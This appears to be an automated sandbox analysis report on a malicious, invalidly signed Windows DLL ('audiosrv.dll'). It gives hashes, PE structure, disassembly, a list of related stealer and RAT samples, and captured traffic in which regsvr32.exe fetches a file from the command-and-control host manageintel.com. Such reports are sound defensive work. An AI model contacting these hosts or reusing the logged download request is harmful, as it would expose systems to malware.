37f463bf4616ecd445d4a1937da06e19	yolo.dll	Get hash	malicious	Unknown	Browse	76.223.105.230
	Markus-Dokumenten-Kaufvertrag.vbs	Get hash	malicious	GuLoader, Remcos	Browse	76.223.105.230
	JVLkkfzSKW.exe	Get hash	malicious	Stealc, Vidar	Browse	76.223.105.230
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Quasar, Stealc	Browse	76.223.105.230
	X9d3758tok.exe	Get hash	malicious	Stealc, Vidar	Browse	76.223.105.230
	KMfWqiiMu0.exe	Get hash	malicious	Stealc, Vidar	Browse	76.223.105.230
	hwWxZRwpeL.exe	Get hash	malicious	Stealc, Vidar	Browse	76.223.105.230
	https://inspyrehomedesign.com/Ray-verify.html	Get hash	malicious	NetSupport RAT	Browse	76.223.105.230
	setup.exe	Get hash	malicious	Unknown	Browse	76.223.105.230
	setup.exe	Get hash	malicious	Unknown	Browse	76.223.105.230

File type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Entropy (8bit):	6.319884088820381
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	audiosrv.dll
File size:	147'656 bytes
MD5:	d9b1327b71d0b2c51845b081ca3fe1c4
SHA1:	3ab1e90dd27462e6c5c1047048433ef4627bb672
SHA256:	c6f7c77c55a58bc37b2ea35baa35781bcead5dd48baf6c04e2f4a15fdedb14f4
SHA512:	7b3520791d9803a34f02bdc66ce70b919d09c216a55cbd09b657efa63824ba61d10f79ed0ef802942f9beafd45f5ea2af9be2bec2e17e6be3fbf40c58ef68281
SSDEEP:	3072:biKjfYjd3b9fSCNq01bKrF5HiLCK08WA46tvTj:+QfYjBMCNcC+KlWuB3
TLSH:	FEE34C017A989035F8FF0A7699B99969973D7920DB00DCEB339425AD4E30BD1AF30D27
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........1.x.b.x.b.x.b...c.x.b...c`x.b...c.x.b...c.x.b...c.x.b...c.x.b...c.x.b.x.b.x.b...c.x.b...c.x.b...c.x.bRich.x.b...............

File Icon


Icon Hash:	7ae282899bbab082

Static PE Info

General

Entrypoint:	0x100095e3
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x10000000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DLL
DLL Characteristics:
Time Stamp:	0x61C2D9AE [Wed Dec 22 07:54:22 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	793636b04c2e2f8cfe97a0d2fa1b60e1

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	02/12/2021 01:00:00 03/12/2022 00:59:59
Subject Chain	CN=SATURN CONSULTANCY LTD, O=SATURN CONSULTANCY LTD, S=Essex, C=GB
Version:	3
Thumbprint MD5:	87CFAD0A22E828FF235A83CA03E90993
Thumbprint SHA-1:	430DBEFF2F6DF708B03354D5D07E78400CFED8E9
Thumbprint SHA-256:	44DAF53D607937F410C3D300100399514D0EE5B03487E7EAD16DFE324D2C5563
Serial:	205483936F360924E8D2A4EB6D3A9F31

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007FA21CB60F07h
call 00007FA21CB61309h
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007FA21CB60DB3h
add esp, 0Ch
pop ebp
retn 000Ch
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 100153A0h
mov dword ptr [ecx], 10015398h
ret
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FA21CB60EDFh
push 1001A634h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FA21CB61DD7h
int3
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FA21CB5A9CCh
push 1001A538h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FA21CB61DBAh
int3
push ebp
mov ebp, esp
and dword ptr [1001CFF0h], 00000000h
sub esp, 24h
or dword ptr [1001C010h], 01h
push 0000000Ah
call dword ptr [100150C4h]
test eax, eax
je 00007FA21CB610AFh
and dword ptr [ebp-10h], 00000000h
xor eax, eax
push ebx
push esi
push edi
xor ecx, ecx
lea edi, dword ptr [ebp-24h]
push ebx
cpuid
mov esi, ebx
pop ebx
mov dword ptr [edi], eax
mov dword ptr [edi+04h], esi
mov dword ptr [edi+08h], ecx
xor ecx, ecx
mov dword ptr [edi+0Ch], edx
mov eax, dword ptr [ebp-24h]
mov edi, dword ptr [ebp-1Ch]
mov dword ptr [ebp-0Ch], eax
xor edi, 0065746Eh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x1ab30	0x80	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1abb0	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x20000	0x5694	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x21a00	0x26c8	.rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1e000	0x132c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x19f0c	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x19f28	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x15000	0x1b8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x13939	0x13a00	7cc1e382ed88cb3cbd57e08ad677bc39	False	0.5420481687898089	data	6.5239922245433615	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x15000	0x65be	0x6600	c2c733489035ceb2db0dc59942846f00	False	0.4176623774509804	data	4.954366240691837	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1c000	0x1a20	0xa00	669fe0230a888871081c3de0f4b83bbd	False	0.171484375	DOS executable (block device driver)	2.41006083542571	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x1e000	0x132c	0x1400	2f11042280ed0ca678c4001a20c1eae7	False	0.748828125	data	6.452027545906491	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0x20000	0x5694	0x5800	936abad4f8527b3db241dbfd46085bf0	False	0.20534446022727273	data	3.7691983408433316	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
MUI	0x2010c	0xf0	data	English	United States	0.5583333333333333
WEVT_TEMPLATE	0x201fc	0x50ca	data	English	United States	0.19693453244367082
RT_VERSION	0x252c8	0x3cc	data	English	United States	0.44753086419753085

Imports

DLL	Import
KERNEL32.dll	DeleteCriticalSection, CreateMutexExW, GetPriorityClass, GetProcessId, GetVersion, GetProductInfo, InitializeCriticalSectionEx, FormatMessageA, FormatMessageW, GetConsoleCP, CreateFileW, CloseHandle, GetStringTypeW, SetFilePointerEx, GetProcessHeap, HeapSize, HeapReAlloc, HeapFree, HeapAlloc, GetLastError, RaiseException, DecodePointer, DisableThreadLibraryCalls, SetFileAttributesW, SetStdHandle, GetConsoleMode, GetConsoleOutputCP, WriteFile, FlushFileBuffers, FreeEnvironmentStringsW, GetEnvironmentStringsW, WideCharToMultiByte, MultiByteToWideChar, GetCommandLineW, GetCommandLineA, GetCPInfo, GetOEMCP, GetACP, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetModuleHandleW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, GetCurrentProcess, TerminateProcess, OutputDebugStringW, EnterCriticalSection, LeaveCriticalSection, RtlUnwind, InterlockedFlushSList, SetLastError, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, LCMapStringW, GetStdHandle, GetFileType, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, WriteConsoleW
USER32.dll	CharNextW, CreatePopupMenu, GetMessageTime
GDI32.dll	TextOutA, FlattenPath, TextOutW
ADVAPI32.dll	RevertToSelf, IsValidSid, IsValidAcl, IsTokenRestricted, GetSidIdentifierAuthority, CveEventWrite
SHELL32.dll	DuplicateIcon
ole32.dll	CoGetCallerTID, CoCreateInstance, CoInitialize, CoTaskMemAlloc, OleInitialize, CoCancelCall
SHLWAPI.dll	SHStrDupA, SHStrDupW, SHGetThreadRef
RPCRT4.dll	UuidCreate, DceErrorInqTextA, RpcExceptionFilter

Exports

Name	Ordinal	Address
DllInstall	1	0x10008630
DllRegisterServer	2	0x10008a90
DllUnregisterServer	3	0x10008be0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-29T12:06:58.190491+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49796	76.223.105.230	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 29, 2024 12:06:57.145432949 CET	49795	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:06:57.145483017 CET	443	49795	76.223.105.230	192.168.2.5
Oct 29, 2024 12:06:57.145581007 CET	49795	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:06:57.145754099 CET	49795	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:06:57.145823956 CET	443	49795	76.223.105.230	192.168.2.5
Oct 29, 2024 12:06:57.145879984 CET	49795	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:06:57.172931910 CET	49796	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:06:57.173026085 CET	443	49796	76.223.105.230	192.168.2.5
Oct 29, 2024 12:06:57.173108101 CET	49796	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:06:57.183752060 CET	49796	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:06:57.183805943 CET	443	49796	76.223.105.230	192.168.2.5
Oct 29, 2024 12:06:57.823255062 CET	443	49796	76.223.105.230	192.168.2.5
Oct 29, 2024 12:06:57.823343039 CET	49796	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:06:57.881031036 CET	49796	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:06:57.881058931 CET	443	49796	76.223.105.230	192.168.2.5
Oct 29, 2024 12:06:57.882234097 CET	443	49796	76.223.105.230	192.168.2.5
Oct 29, 2024 12:06:57.886301994 CET	49796	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:06:57.889128923 CET	49796	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:06:57.935353994 CET	443	49796	76.223.105.230	192.168.2.5
Oct 29, 2024 12:06:58.190603018 CET	443	49796	76.223.105.230	192.168.2.5
Oct 29, 2024 12:06:58.190649033 CET	443	49796	76.223.105.230	192.168.2.5
Oct 29, 2024 12:06:58.190682888 CET	443	49796	76.223.105.230	192.168.2.5
Oct 29, 2024 12:06:58.190684080 CET	49796	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:06:58.190715075 CET	443	49796	76.223.105.230	192.168.2.5
Oct 29, 2024 12:06:58.190730095 CET	49796	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:06:58.190730095 CET	49796	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:06:58.190773010 CET	49796	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:06:58.209433079 CET	49796	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:06:58.209497929 CET	443	49796	76.223.105.230	192.168.2.5
Oct 29, 2024 12:06:58.209564924 CET	49796	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:06:58.228971958 CET	49803	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:06:58.229038954 CET	443	49803	76.223.105.230	192.168.2.5
Oct 29, 2024 12:06:58.229193926 CET	49803	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:06:58.229264021 CET	49803	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:06:58.229377031 CET	443	49803	76.223.105.230	192.168.2.5
Oct 29, 2024 12:06:58.229433060 CET	49803	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:06:58.230555058 CET	49804	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:06:58.230616093 CET	443	49804	76.223.105.230	192.168.2.5
Oct 29, 2024 12:06:58.230751038 CET	49804	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:06:58.231024027 CET	49804	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:06:58.231039047 CET	443	49804	76.223.105.230	192.168.2.5
Oct 29, 2024 12:06:58.867084026 CET	443	49804	76.223.105.230	192.168.2.5
Oct 29, 2024 12:06:58.867223024 CET	49804	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:06:58.870711088 CET	49804	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:06:58.870721102 CET	443	49804	76.223.105.230	192.168.2.5
Oct 29, 2024 12:06:58.871057987 CET	443	49804	76.223.105.230	192.168.2.5
Oct 29, 2024 12:06:58.871118069 CET	49804	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:06:58.871429920 CET	49804	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:06:58.915344000 CET	443	49804	76.223.105.230	192.168.2.5
Oct 29, 2024 12:06:59.140146017 CET	443	49804	76.223.105.230	192.168.2.5
Oct 29, 2024 12:06:59.140183926 CET	443	49804	76.223.105.230	192.168.2.5
Oct 29, 2024 12:06:59.140238047 CET	443	49804	76.223.105.230	192.168.2.5
Oct 29, 2024 12:06:59.140319109 CET	49804	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:06:59.140362024 CET	443	49804	76.223.105.230	192.168.2.5
Oct 29, 2024 12:06:59.140391111 CET	49804	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:06:59.140422106 CET	49804	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:06:59.142179012 CET	49804	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:06:59.142246962 CET	443	49804	76.223.105.230	192.168.2.5
Oct 29, 2024 12:06:59.142457962 CET	443	49804	76.223.105.230	192.168.2.5
Oct 29, 2024 12:06:59.142529011 CET	49804	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:06:59.142568111 CET	49804	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:06:59.166496038 CET	49810	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:06:59.166554928 CET	443	49810	76.223.105.230	192.168.2.5
Oct 29, 2024 12:06:59.166641951 CET	49810	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:06:59.166759968 CET	49810	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:06:59.166878939 CET	443	49810	76.223.105.230	192.168.2.5
Oct 29, 2024 12:06:59.167052984 CET	49810	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:06:59.167527914 CET	49811	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:06:59.167577982 CET	443	49811	76.223.105.230	192.168.2.5
Oct 29, 2024 12:06:59.167653084 CET	49811	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:06:59.167995930 CET	49811	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:06:59.168005943 CET	443	49811	76.223.105.230	192.168.2.5
Oct 29, 2024 12:06:59.827837944 CET	443	49811	76.223.105.230	192.168.2.5
Oct 29, 2024 12:06:59.828071117 CET	49811	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:06:59.829996109 CET	49811	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:06:59.830014944 CET	443	49811	76.223.105.230	192.168.2.5
Oct 29, 2024 12:06:59.830435991 CET	443	49811	76.223.105.230	192.168.2.5
Oct 29, 2024 12:06:59.830498934 CET	49811	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:06:59.831005096 CET	49811	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:06:59.871345043 CET	443	49811	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:00.102305889 CET	443	49811	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:00.102344990 CET	443	49811	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:00.102364063 CET	443	49811	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:00.102482080 CET	49811	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:00.102550030 CET	443	49811	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:00.102590084 CET	49811	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:00.102612019 CET	49811	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:00.219847918 CET	443	49811	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:00.219918966 CET	443	49811	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:00.219954967 CET	49811	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:00.220036983 CET	443	49811	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:00.220077038 CET	49811	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:00.220098972 CET	49811	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:00.336539984 CET	443	49811	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:00.336595058 CET	443	49811	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:00.336693048 CET	49811	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:00.336776972 CET	443	49811	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:00.336812973 CET	49811	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:00.336837053 CET	49811	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:00.453054905 CET	443	49811	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:00.453162909 CET	443	49811	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:00.453239918 CET	443	49811	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:00.453253031 CET	49811	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:00.453296900 CET	49811	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:00.453296900 CET	49811	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:00.455738068 CET	49811	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:00.455776930 CET	443	49811	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:00.483163118 CET	49817	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:00.483211994 CET	443	49817	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:00.483294964 CET	49817	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:00.483413935 CET	49817	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:00.483472109 CET	443	49817	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:00.483524084 CET	49817	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:00.483944893 CET	49818	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:00.483982086 CET	443	49818	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:00.484036922 CET	49818	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:00.484325886 CET	49818	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:00.484339952 CET	443	49818	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:01.113986015 CET	443	49818	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:01.114083052 CET	49818	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:01.114739895 CET	49818	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:01.114752054 CET	443	49818	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:01.114936113 CET	49818	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:01.114942074 CET	443	49818	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:01.384537935 CET	443	49818	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:01.384567022 CET	443	49818	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:01.384586096 CET	443	49818	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:01.384610891 CET	49818	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:01.384632111 CET	443	49818	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:01.384644985 CET	49818	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:01.384680986 CET	49818	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:01.500881910 CET	443	49818	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:01.500921011 CET	443	49818	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:01.500977993 CET	49818	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:01.501002073 CET	443	49818	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:01.501013041 CET	49818	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:01.501043081 CET	49818	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:01.616471052 CET	443	49818	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:01.616533041 CET	443	49818	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:01.616641045 CET	49818	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:01.616667986 CET	443	49818	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:01.616767883 CET	49818	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:01.732863903 CET	443	49818	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:01.732909918 CET	443	49818	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:01.732964039 CET	49818	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:01.732992887 CET	443	49818	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:01.733006001 CET	49818	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:01.733009100 CET	443	49818	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:01.733033895 CET	49818	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:01.733062983 CET	49818	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:01.734165907 CET	49818	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:01.734181881 CET	443	49818	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:01.750303984 CET	49829	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:01.750406027 CET	443	49829	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:01.750503063 CET	49829	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:01.750602007 CET	49829	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:01.750654936 CET	443	49829	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:01.750715971 CET	49829	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:01.751112938 CET	49830	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:01.751163006 CET	443	49830	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:01.751225948 CET	49830	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:01.751518965 CET	49830	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:01.751534939 CET	443	49830	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:02.377089977 CET	443	49830	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:02.377167940 CET	49830	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:02.377547026 CET	49830	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:02.377562046 CET	443	49830	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:02.377734900 CET	49830	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:02.377742052 CET	443	49830	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:02.645612955 CET	443	49830	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:02.645647049 CET	443	49830	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:02.645673037 CET	443	49830	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:02.645813942 CET	49830	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:02.645813942 CET	49830	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:02.645849943 CET	443	49830	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:02.645919085 CET	49830	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:02.761087894 CET	443	49830	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:02.761116982 CET	443	49830	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:02.761173964 CET	49830	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:02.761199951 CET	443	49830	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:02.761219978 CET	49830	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:02.761241913 CET	49830	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:02.876910925 CET	443	49830	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:02.876983881 CET	443	49830	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:02.877039909 CET	49830	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:02.877064943 CET	443	49830	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:02.877093077 CET	49830	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:02.877110958 CET	49830	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:02.992068052 CET	443	49830	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:02.992132902 CET	443	49830	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:02.992167950 CET	443	49830	76.223.105.230	192.168.2.5
Oct 29, 2024 12:07:02.992198944 CET	49830	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:02.992252111 CET	49830	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:02.993554115 CET	49830	443	192.168.2.5	76.223.105.230
Oct 29, 2024 12:07:02.993578911 CET	443	49830	76.223.105.230	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 29, 2024 12:06:57.105165958 CET	52256	53	192.168.2.5	1.1.1.1
Oct 29, 2024 12:06:57.139652967 CET	53	52256	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 29, 2024 12:06:57.105165958 CET	192.168.2.5	1.1.1.1	0x6b9c	Standard query (0)	manageintel.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 29, 2024 12:06:57.139652967 CET	1.1.1.1	192.168.2.5	0x6b9c	No error (0)	manageintel.com		76.223.105.230	A (IP address)	IN (0x0001)	false
Oct 29, 2024 12:06:57.139652967 CET	1.1.1.1	192.168.2.5	0x6b9c	No error (0)	manageintel.com		13.248.243.5	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

manageintel.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49796	76.223.105.230	443	5400	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-29 11:06:57 UTC	100	OUT	GET /RKyiihqXQiyE/xukYadevoVow/QXms.xml HTTP/1.1 Host: manageintel.com Cache-Control: no-cache
